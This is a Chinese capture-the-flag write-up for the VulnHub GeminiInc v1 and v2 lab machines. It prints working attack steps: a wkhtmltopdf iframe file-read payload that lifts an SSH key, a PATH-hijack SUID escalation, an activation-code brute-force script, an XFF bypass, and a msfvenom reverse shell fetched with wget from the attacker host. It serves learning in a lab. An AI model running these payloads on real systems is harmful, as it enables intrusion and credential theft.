内容简介:最近和组内大佬一起刷的vulnhub,nmap探测一波端口信息
最近和组内大佬一起刷的vulnhub, GeminiInc
有v1和v2两个版本,感觉有很多新奇的东西,遂单独拿出来记录一下
GeminiInc V1
主机探测
arp-scan -l
探测一手ip信息,检测到靶机ip为 192.168.85.142
nmap探测一波端口信息
nmap -sS -T4 -A -v 192.168.85.142
开了常规的 22
和 80
端口
web attack
访问80端口后是个监听的目录,只有一个 test2
目录,进去就是了
给出了一个建站模板的github地址
分析一波之后可以在 install.php
中看到默认的管理员账号密码
可以尝试用这个默认的管理员账号密码登录一下,发现刚好可以登录!
登录之后可以看到有两个功能模块,修改资料和导出资料
导出的资料就是个人界面的一个pdf
在二进制流中可以发现是用 wkhtmltopdf
生成的pdf文件
在修改资料中我们可以完全控制的有一个 display name
字段,尝试插入一些 script
字段发现也可以成功插入
<script>alert(/xss/)</script>
这样的话,感觉接下来应该是插入一些特殊的标签,来攻击靶机
但是,我尝试了所有我能想到的攻击方式,却起不了一点作用,于是看了下别人的writeup
首先现在自己的www目录下写入这样一个 php 文件,
1.php
<?php $filename = $_GET['file']; header("Location: file://$filename");
然后在 display name
字段中插入
<iframe src="http://192.168.85.134/1.php?file=/etc/passwd" width="100%" height=1220></iframe>
导出pdf之后,就能看到,读取出了靶机中的 /etc/passwd
文件
至于具体原理,可以看 https://github.com/wkhtmltopdf/wkhtmltopdf/issues/3570
应该是出题人自己挖的一个0day,只能说太强了orz
这样的话我们就可以进一步读取 gemini1
用户 /home/gemini1/.ssh/id_rsa
文件,来通过私钥登录靶机
这里直接在 linux 上通过 ssh -i
方式登录似乎会有一点格式问题,但是通过xshell导入私钥文件登录就不会出现问题
suid提权
一般低权限登录进去首先就是查看下系统版本,看看有没有什么能提权的脚本
比较尴尬的就是,linux版本相当高了,找了半天没有找到对应版本的提权,稍微看了下writeup是通过suid提权
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。
具体原理可以参照下 https://www.anquanke.com/post/id/86979
查看一下具有SUID或4000权限的文件。
find / -perm -u=s -type f 2>/dev/null
运行一下可以发现这里面运行了 date
命令
这个文件的所有者为 root
,这样我们就可以修改环境变量中的 date
命令来以root的身份执行想要执行的代码
cd /tmp echo "/bin/sh" > date chmod 777 date echo $PATH export PATH=/tmp:$PATH /usr/bin/listinfo
这样就借助suid的权限切换,成功获得到了root权限,最后的flag
GeminiInc V2
主机探测
虽然说V2是V1的升级版,但是似乎没有太大的关系,一开始还是一波ip探测和nmap的端口扫描
还是常规的22和80,这里有一个比较重要的点就是目录扫描
在实际的跳转链接中,就只有 index.php
和 login.php
两个和界面,所以需要一个比较全的字典来扫描
dirb http://192.168.85.140 SVNDigger/all.txt
两个比较重要的文件就是 activate.php
和 registration.php
用户登录
在 registration.php
中可以申请一个用户
注册完之后会有提示说需要一个六位数的邀请码
在激活页面 activate.php
中需要输入激活用户的id,就可以通过访问 My Profile
后在url处获取用户id
至于六位数的邀请码,这个可能需要写一个脚本来爆破,由于六位确实有点长,出题人也只给了一个三位数值的六位数邀请码,方便爆破
import requests import re import threading url = "http://192.168.85.140/activate.php" def get_code(): for i in range(1000000): l = len(str(i)) if l<6: yield '0'*(6-l)+str(i) else: yield str(i) def get_token(): cookies = dict(PHPSESSID="6bc1s35thd0glrft571gfud8c0") r = requests.get(url, cookies=cookies) token = re.search(r"[0-9a-f]{40}", r.text) if token is not None: return token.group(0) else: raise ValueError("can not find token") def submit(code): data = dict(userid="17",activation_code=code,token=get_token()) cookies = dict(PHPSESSID="6bc1s35thd0glrft571gfud8c0") r = requests.post(url , data=data, proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}, cookies=cookies) if r.status_code == 403: print('[{}] => {}'.format(r.status_code, code)) # print(r.headers) else: print('[{}] => {}'.format(r.status_code, code)) exit() for code in get_code(): submit(code)
在 000511
的时候就可以确认成功登录
命令执行
进去之后,试了一下V1的常规操作,发现已经对html字符进行了实体编码
然后在查看源代码的时候无意中看到了被注释的密码哈希
这样,我们访问 /profile.php?u=1
就可以或得到管理员的密码哈希
在管理员登录后台中就多了一个 Admin Panel
模块里面有 Execute Command
,可是访问的时候却被禁止了
用burp拦截包之后可以看到是ip被禁止了
没想到设置了一波ctf中最常见的XFF就成功登录进去了
尝试执行了一些命令,发现 <
, >
, |
, \
还有空格一些符号被禁止了
这样的话空格可以用tab键来替代,然后尝试执行 shell 反弹
在本地用 msfvenom
生成一个反弹脚本,放在www目录下
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.85.134 LPORT=8888 -f elf -o rev
并监听本地8888端口
nc -lnvp 8888
然后在靶机中下载该文件并执行
wget -O /tmp/rev 192.168.85.134/rev chmod 777 /tmp/rev /tmp/rev
此时shell就反弹到了kali中,但是是一个交互性极差的shell,所以尝试写入私钥通过私钥登录
在本地 ssh-keygen -t rsa
后,将 /root/.ssh/id_rsa_pub
中的值放入靶机中的 /home/gemini1/.ssh/authorized_keys
中
cd /home/gemini1 mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7/vRIIw5g42JZpNFiZ96w2aRZhEzYQclqXMaw0j8Me7oPh8EGrmzYNz7fNUoUtkg8ebcGRHAA1zfpyHlL/A1BIqiGIvYtq/Xy+g9Zkle6l4zMxvwDfnfrqoyrJLYpxLh8NjzqkO2wWOoFJYNg1QCUXAvkiaZgoyJXUiUdP6ZPk0a5HGDEoZNCxYMo7QnxMAfdo24Qo+rzDrimbUMkXe76w2xxi1YhulVFGdX8daiG8X/oNInSWHuyOD9Q5DRpgjv5MPY4exTiVgDA9l2gn/Qk9ZlOnC0YxZXgZZxzJBH2rRGeCt+xjV13IQ0sFmIh3LenfM7RcvBof6P58WBiS2Cv root@kali " > /home/gemini1/.ssh/authorized_keys
然后在kali中 ssh -i id_rsa gemini1@192.168.85.140
链接即可
提权权限
和之前的V1一样,依旧是版本过高没有现成的提权脚本,看了开启的服务,有一个以roott权限运行的redis
那就尝试一下常规的 redis 未授权访问的套路,可是似乎是已授权的
最后在搜索引擎的帮助下,在配置文件中找到了redis密码
然后就改公钥走一波
私钥登录,cat flag
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。